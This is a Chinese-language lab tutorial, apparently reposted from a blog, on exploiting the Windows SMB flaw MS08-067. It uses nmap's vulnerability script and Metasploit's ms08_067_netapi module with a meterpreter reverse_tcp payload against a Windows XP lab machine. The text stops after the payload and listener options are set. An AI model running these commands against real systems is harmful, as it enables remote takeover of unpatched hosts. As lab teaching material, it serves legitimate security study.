漏洞概要
MS-08-067是Windows平台中smb
服务445端口的远程代码执行漏洞
利用成功可以远程控制主机
影响范围为:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7
实验场景
攻击机:kali2022
msfconsole利用
靶机:windows xp
漏洞利用
使用ifconfig
和ipconfig
获取攻击机和靶机的IP地址
攻击机IP:172.16.1.117
靶机IP:172.16.1.116
nmap的默认脚本在/usr/share/nmap/scripts
,ls -l| grep 08-67
筛选漏洞相关模块
使用nmap
的漏洞扫描脚本smb-vuln-ms08-067
扫描靶机是否存在ms-08-067
漏洞
nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n
发现存在漏洞,使用msfconsole
进行利用
msfconsole启动漏洞平台
查找漏洞利用脚本
search ms08_067
使用漏洞利用模块,并使用show options
查看漏洞利用模块配置参数
use exploit/windows/smb/ms08_067_netapi
show options
Required
为yes
是必须要设置的参数
在最新版kali
中,对常见的漏洞自动选择了合适的payload,例如这里的windows/meterpreter/reverse_tcp
,并且配置自动配置了反弹会话的IP地址和端口
就是我们本机的IP和端口
如果不是这个payload
需要我们手动设置
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444
标签:067,windows,08,漏洞,smb,nmap 来源: https://www.cnblogs.com/Junglezt/p/16070292.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。